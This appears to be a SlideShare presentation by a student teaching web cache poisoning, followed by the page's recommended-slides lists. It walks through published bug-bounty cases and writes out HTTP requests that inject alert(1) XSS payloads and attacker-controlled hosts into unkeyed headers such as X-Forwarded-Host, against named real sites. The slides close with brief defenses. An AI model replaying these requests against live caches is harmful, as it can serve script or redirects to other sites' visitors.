SlideShare uma empresa Scribd logo

Web Cache Poisoning

Transferir como PPTX, PDF
K
KuldeepPandya5

From introduction to advanced web cache poisoning

Internet
1 de 48
Web Cache Poisoning - Kuldeep Pandya
About Me ● A neophyte ● Web enthusiast ● iAm NoT yEt wORkInG iAm sTiLl sTudiNg (◕‿◕)
Overview ● What cache poisoning we are talking about? ● Quickly Recalling Caching ● Case Studies ● Practical Time ● Defense
Web Cache Poisoning at a glance Web Cache Poisoning is NOT ● Web Cache Deception ● Browser Cache Poisoning ● Request Smuggling ● Response Splitting ● DNS Cache Poisoning
How response caching works
Web Cache Poisoning
Cache Keys GET /bootstrap.css HTTP/1.1 Host: example.com User-Agent: Chrome/71.0….Linux/4.15 Blah: … ● Cache Keys are used to uniquely identify cached object
Unkeyed Inputs and key collison GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=english Blah: .. GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=hindi Blah: ..
Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Response: Blah… <title>नमस्ते दुननया</title> Blah...
Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Cached Response: Blah… <title>Hello World</title> Blah...
How do we poison caches? ● Using unkeyed inputs like HTTP Headers ● Using Request Smuggling ● Using Response Splitting ➔ This presentation is focused on exploiting using HTTP Headers
Approach to web cache poisoning
Quick Example On Web Cache Poisoning
A normal request Request: GET /login.php HTTP/1.1 Host: 191.168.56.101 Blah: … Response: Blah: ... <img src=”192.168.56.101/image.png” /> Blah...
A funny request Request: GET /login.php HTTP/1.1 Host: 192.168.56.101 X-Forwarded-Host: lol“/><svg onload=’alert(1)’> Blah: ... Response: Blah: … <img src=”lol"/><svg onload='alert(1)'>/image.png” />
We all like practicals, don’t we?
Case Studies
Cached XSSed Response in redhat.com GET /en?dontpoisoneveryone=1 HTTP/1.1 Host: www.redhat.com X-Forwarded-Host: a."><script>alert(1)</script> HTTP/1.1 200 OK Cache-Control: public, no-cache Blah… <meta property="og:image" content="https://a."><script>alert(1)</script>"/>
Discreet Poisoning ● We just poisoned the cache for https://redhat.com/en?dontpoisoneveryone=1 ● We need to be first to send the request whenever this cache expires in order to poison site’s legitimate users. ● We need to reverse engineer cache expiry system and crawl into documentation to figure out exact time the cached object will be expired.
unity3d.com Request: GET / HTTP/1.1 Host: unity3d.com X-Host: portswigger-labs.net HTTP/1.1 200 OK Via: 1.1 varnish-v4 Age: 174 Cache-Control: public, max-age=1800 … <script src="https://portswigger- labs.net/sites/files/foo.js"></script>
Selective Poisoning GET / HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 … Firefox/60.0 X-Forwarded-Host: a"><iframe onload=alert(1)> HTTP/1.1 200 OK X-Served-By: cache-lhr6335-LHR Vary: User-Agent, Accept-Encoding … <link rel="canonical" href="https://a">a<iframe onload=alert(1)> </iframe>
DOM Poisoning Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: canary Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site-root="https://canary/">
Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: id.burpcollaborator.net Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site- root="https://id.burpcollaborator.net/">
Request: GET /api/i18n/es HTTP/1.1 Host: catalog.data.gov Response: HTTP/1.1 200 OK … {"Show more":"Mostrar más"}
Request: GET /api/i18n/es HTTP/1.1 Host: portswigger-labs.net Response: HTTP/1.1 200 OK … {"Show more":"<svg onload=alert(1)>"}
● A cool feature to install addons in background for marketing purposes ● This feature became famous by forcefully installing Mr.Robot extension in background ● They were using Nginx for caching ● Mozilla sent a weird request which contained Origin header in all lowercase Mozilla SHIELD GET /api/v1/recipe/signed/ HTTP/1.1 Blah: ... origin: null Blah: ...
Request: GET /api/v1/ HTTP/1.1 Host: normandy.cdn.mozilla.net X-Forwarded-Host: xyz.burpcollaborator.net HTTP/1.1 200 OK { ... "recipe-list": "https://xyz.burpcollaborator.net/a pi/v1/recipe/", "recipe-signed": "https://xyz.burpcollaborator.net/a pi/v1/recipe/signed/", ... }
● Signing was there so we couldn’t install any addon of our choice ● Backend mozilla systems that use unsigned recipes let us peek into system and might help us obtain signing key ● But we could still perform a DDoS ● We could install already signed addons
Route Poisoning in goodhire.com ● Some applications dumbly use request headers to generate URLs and use them for routing :) ● goodhire.com is hosted on hubspot.com which is using cloudflare caching server.
Route Poisoning in goodhire.com Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Server: canary Response: HTTP/1.1 404 Not Found CF-Cache-Status: MISS ... <title>HubSpot - Page not found</title> <p>The domain canary does not exist in our system.</p>
Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Host: portswigger-labs- 4223616.hs-sites.com Response: HTTP/1.1 200 OK ... <script>alert(document.domain)</script>
Hidden route poisoning ● This vulnerability was in blog.cloudflare.com which was using its own caching service ● blog.cloudflare.com is hosted using Ghost.
A normal fail response Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: canary Response: HTTP/1.1 302 Found Location: https://ghost.org/fail/
Supplying already hosted website Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: blog.binary.com Response: HTTP/1.1 200 OK Normal response Still No Luck :(
B...bu….but what if we use a website hosted on ghost? Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: noshandnibble.ghost.io Response: HTTP/1.1 302 Found Location: http://noshandnibble.blog/
How much damage can we do with it? ● Files that were cached a. jpg b. png c. pdf d. js e. css
Bypassing mixed-content protection ● Mixed-content is when your website is HTTPS and is requesting some resource via HTTP. ● Browsers block this type of imports and this feature is called mixed-content protection. ● This redirect ghost did was an HTTP rather than HTTPS which was a big obstacle. Again stuck :/
Luckily, bounty hunters helped ● Safari’s HSTS redirect automatically upgrades it to HTTPS ● HSTS is a technique which is used to prevent data from being eavesdropped by upgrading from HTTP to HTTPS. ● Edge’s 302 response completely bypasses mixed- content protection
Chaining unkeyed inputs ● Sometimes, unkeyed inputs only confuse some part of application. ● We will need to chain unkeyed inputs in order to get something useful
Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: xyz Response: HTTP/1.1 200 OK Set-Cookie: locale=en; domain=xyz Request 1
Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://redacted.net/en Request 2
Request 1 + Request 2 = WCP Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://attacker.com/en
Open Graph Hijacking ● Here’s everyone’s favourite, facebook hacking! ● Open Graph is a protocol developed by Facebook which allows to integrate between facebook and other apps. ● But what if we cache some malicious page which will in turn share what we want to share? Let’s try it out.
Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com Response: HTTP/1.1 200 OK Cache-Control: max-age=0, private, must- revalidate … <meta property="og:url" content='https://attacker.com/en'/>
Time for practicals!!!
Defense ● Do NOT use caching at all! ● Avoid taking input from headers. ● If do, then include them in cache key. ● Use burp active scanner or Param Miner like tools to find out unkeyed inputs.
Thanks ● Connect with me ○ kuldeep.pandya.77799@Facebook ○ some_dank_boi@Instagram ○ Predator77799@Twitter
Credits James Kettle albinowax@Twitter References: https://portswigger.net/blog/practic al-web-cache-poisoning https://youtu.be/j2RrmNxJZ5c

Recomendados

Cache poisoning
Cache poisoningCache poisoning
Cache poisoning
AlexandraLacatus
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
DefconRussia
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
Ssrf
SsrfSsrf
Ssrf
Ilan Mindel
 

Recomendados

Cache poisoning
Cache poisoningCache poisoning
Cache poisoning
AlexandraLacatus
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
DefconRussia
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
Ssrf
SsrfSsrf
Ssrf
Ilan Mindel
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
IDOR Know-How.pdf
IDOR Know-How.pdfIDOR Know-How.pdf
IDOR Know-How.pdf
Bhashit Pandya
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Http request smuggling
Http request smugglingHttp request smuggling
Http request smuggling
n|u - The Open Security Community
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
Ismael Goncalves
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Click jacking
Click jackingClick jacking
Click jacking
Ronan Dunne, CEH, SSCP
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
Felipe Prado
 
Web performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionWeb performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transition
seanwalbran
 

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
IDOR Know-How.pdf
IDOR Know-How.pdfIDOR Know-How.pdf
IDOR Know-How.pdf
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Http request smuggling
Http request smugglingHttp request smuggling
Http request smuggling
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Click jacking
Click jackingClick jacking
Click jacking
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 

Semelhante a Web Cache Poisoning

Optimising Web Application Frontend
Optimising Web Application FrontendOptimising Web Application Frontend
Optimising Web Application Frontend
tkramar
 
Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014
bryan_call
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
timbc
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
NoNameCon
 
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Ontico
 

Semelhante a Web Cache Poisoning (20)

DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
 
Web performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionWeb performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transition
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Altitude SF 2017: The power of the network
Altitude SF 2017: The power of the networkAltitude SF 2017: The power of the network
Altitude SF 2017: The power of the network
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStation
 
Optimising Web Application Frontend
Optimising Web Application FrontendOptimising Web Application Frontend
Optimising Web Application Frontend
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
 
Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
Web performance mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013Web performance mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
 
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
 
Integrated Cache on Netscaler
Integrated Cache on NetscalerIntegrated Cache on Netscaler
Integrated Cache on Netscaler
 
Implementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesImplementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and Challenges
 
HTTP fundamentals for developers
HTTP fundamentals for developersHTTP fundamentals for developers
HTTP fundamentals for developers
 
HTTP
HTTPHTTP
HTTP
 
AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013
 
Generating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status CodesGenerating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status Codes
 

Último

哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
ydyuyu
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
gajnagarg
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
pxcywzqs
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Monica Sydney
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
ydyuyu
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
ayvbos
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Monica Sydney
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
JOHNBEBONYAP1
 
75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptx75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptx
Asmae Rabhi
 

Último (20)

哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency Dallas
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
Power point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria IuzzolinoPower point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria Iuzzolino
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
 
75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptx75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptx
 

Web Cache Poisoning

  • 2. About Me ● A neophyte ● Web enthusiast ● iAm NoT yEt wORkInG iAm sTiLl sTudiNg (◕‿◕)
  • 3. Overview ● What cache poisoning we are talking about? ● Quickly Recalling Caching ● Case Studies ● Practical Time ● Defense
  • 4. Web Cache Poisoning at a glance Web Cache Poisoning is NOT ● Web Cache Deception ● Browser Cache Poisoning ● Request Smuggling ● Response Splitting ● DNS Cache Poisoning
  • 7. Cache Keys GET /bootstrap.css HTTP/1.1 Host: example.com User-Agent: Chrome/71.0….Linux/4.15 Blah: … ● Cache Keys are used to uniquely identify cached object
  • 8. Unkeyed Inputs and key collison GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=english Blah: .. GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=hindi Blah: ..
  • 9. Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Response: Blah… <title>नमस्ते दुननया</title> Blah...
  • 10. Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Cached Response: Blah… <title>Hello World</title> Blah...
  • 11. How do we poison caches? ● Using unkeyed inputs like HTTP Headers ● Using Request Smuggling ● Using Response Splitting ➔ This presentation is focused on exploiting using HTTP Headers
  • 12. Approach to web cache poisoning
